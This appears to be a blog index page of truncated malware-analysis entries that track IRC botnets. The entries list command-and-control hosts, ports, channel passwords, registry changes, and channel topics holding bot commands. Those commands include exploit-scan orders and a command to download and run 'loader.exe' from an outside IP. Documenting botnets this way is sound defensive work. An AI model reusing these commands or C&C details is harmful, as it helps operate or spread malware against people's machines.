Category: Uncategorized

fatalz.net

Uncategorized

Remote Host Port Number200.74.240.149 8094.23.121.227 7000 * The data identified by the following URL was then requested from the remote web server: o http://facebook.freephphosting.biz/illusion/?act=online&s4=25580&s5=0&nickname=Q29tcHV0ZXJOYW1lWzExNDcwM10= Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionConsoleNameSpace o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_NTNDIS o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_NTNDIS000 o HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesntndis o HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesntndisSecurity * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionConsoleNameSpace] +Read more...

Server : FederalBereauofInvestigation [1.2.1546]

Uncategorized

Remote Host Port Number72.184.197.176 6667 NICK XP|00|USA|SP2|7921USER aqxt 0 0 :XP|00|USA|SP2|7921USERHOST XP|00|USA|SP2|7921MODE XP|00|USA|SP2|7921 +x+iBJOIN #eckoPONG :FederalBereauofInvestigation Other details * The following ports were open in the system: Port Protocol Process113 TCP msconfig.exe (%System%msconfig.exe)1052 TCP msconfig.exe (%System%msconfig.exe) Registry Modifications * The following Registry Keys were created: o [pathname with a string SHARE]MSConfig o [pathname with aRead more...

buli.burimche.net(50k bots)

Uncategorized

buli.burimche.net:4244chanel:##bb## email from this guy in case u want to ask him about his bots lolburimi@nerashti.com Resolved : [nerashti.com] To [68.180.151.76]

DarkSons.Virus.Gov

Uncategorized

Remote Host Port Number193.242.108.49 80216.45.58.150 8064.120.11.167 5900 * The data identified by the following URLs was then requested from the remote web server: o http://193.242.108.49/Dialer_Min/number.asp o http://www.sitepalace.com/w0rmreaper/NoVaC.jpeg NICK VirUs-jbqiiwehUSER VirUs “” “bud” :8Coded8VirUs..JOIN #THeRaNdOm1# VirusPRIVMSG #THeRaNdOm1# :Success.PONG :DarkSons.Virus.Gov PASS Virus Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-61WE-KKX2-457QWE23218} * TheRead more...

armageddoncheats.net

Uncategorized

Remote Host Port Number213.5.65.29 21213.5.65.29 35989213.5.65.29 80 ftp conections:USER cmin04@armageddoncheats.netUSER rmin01@armageddoncheats.netpasswd:123456 * The data identified by the following URLs was then requested from the remote web server: o http://armageddoncheats.net/1.php?p1=COMPUTERNAME_HXOR o http://armageddoncheats.net/2.php?p1=COMPUTERNAME_HXOR&p2=. o http://armageddoncheats.net/2.php?p1=COMPUTERNAME_HXOR&p2=.. o http://armageddoncheats.net/3.php?p1=COMPUTERNAME_HXOR Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_IBUFFER o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_IBUFFER000 o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_IBUFFER000Control o HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesIBuffer o HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesIBufferSecurity oRead more...

gandu.marcandpatrick.net

Uncategorized

Name Query Type Query Result Successful Protocol kat.jatajoo.ru DNS_TYPE_A 91.207.6.166 1 gandu.marcandpatrick.net DNS_TYPE_A 218.61.22.10 1 hot.jatajoo.ru DNS_TYPE_A 89.149.244.22 1 218.61.22.10:1544 Nick: [00_AUT_XP_5687882]Username: SP3-980Server Pass: pacodeddJoined Channel: ##f## with Password openChannel Topic for Channel ##F##: “.asc -S|.http http://rapidshare.com/files/314789063/bay|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0Read more...

85.17.138.130

Uncategorized

Remote Host Port Number192.168.88.2 80 85.17.138.130 81 NICK xx[USA|XP]5722214PONG :index.htmlUSER oo oo oo :bbJOIN #.ooo Registry Modifications The following Registry Keys were created:HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONSHKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONS000HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesMacrovisionsHKEY_CURRENT_USERSoftwareMacrovisionsThe newly created Registry Values are:[HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONS000]Service = “Macrovisions”Legacy = 0x00000001ConfigFlags = 0x00000000Class = “LegacyDriver”ClassGUID = “{8ECC055D-047F-11D1-A537-0000F8753ED1}”DeviceDesc = “Macrovisions”[HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONS]NextInstance = 0x00000001[HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesMacrovisions]DisplayName = “Macrovisions”ImagePath = “??%Temp%71863.sys”Type = 0x00000001Start = 0x00000003 Memory Modifications There was aRead more...

iik.for5love.ru(big ruski botnet)

Uncategorized

Host Name IP Addressdell-d3e62f7e26 10.1.12.2iik.for5love.ru 195.190.13.187ik.whytakebi.com 218.61.22.10hot.jatajoo.ru hot.jatajoo.ru 195.190.13.187Download URLshttp://195.190.13.187/hot.php (iik.for5love.ru)http://195.190.13.187/hot.php (iik.for5love.ru)http://195.190.13.187/hot.php (iik.for5love.ru) * C&C Server: 195.190.13.187:7272 * Server Password: * Username: SP3-152 * Nickname: [N00_DEU_XP_1314922]_CHAR(0x08)_ä@ * Channel: (Password: ) * Channeltopic: * C&C Server: 218.61.22.10:7272 * Server Password: * Username: SP3-686 * Nickname: [00_DEU_XP_1861146] * Channel: #nit (Password: open) * Channeltopic: :.asc -S|.http http://rapidshare.com/files/314264722/re|.advscanRead more...

trbotnet.sytes.net(irc botnet)

Uncategorized

Host Name IP Address dell-d3e62f7e26 10.1.13.2 trbotnet.sytes.net 85.153.30.14 * C&C Server: 85.153.30.14:6667 * Server Password: * Username: rciahpk * Nickname: [DEU|XP|772697] * Channel: #son (Password: botnetim) * Channeltopic: :.msn seen foto? hxxp://www.travestiniz.co.cc/images.php?id= |.msn.email hxxp://www.travestiniz.co.cc/images.php?id= |.p2p |.yims Topic By: [ Load ]

91.207.6.166(16k botnet)

Uncategorized

91.207.6.166 : 154491.207.6.166:3838 chanel=##F## Now talking in ##F##Topic On: [##F## ] [ .asc -S|.http http://rapidshare.com/files/313278869/hus|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://78.159.127.254/del/loader.exe C:start.exe 1 ]Topic By: [ ok ]Modes On: [ ##F## ]Read more...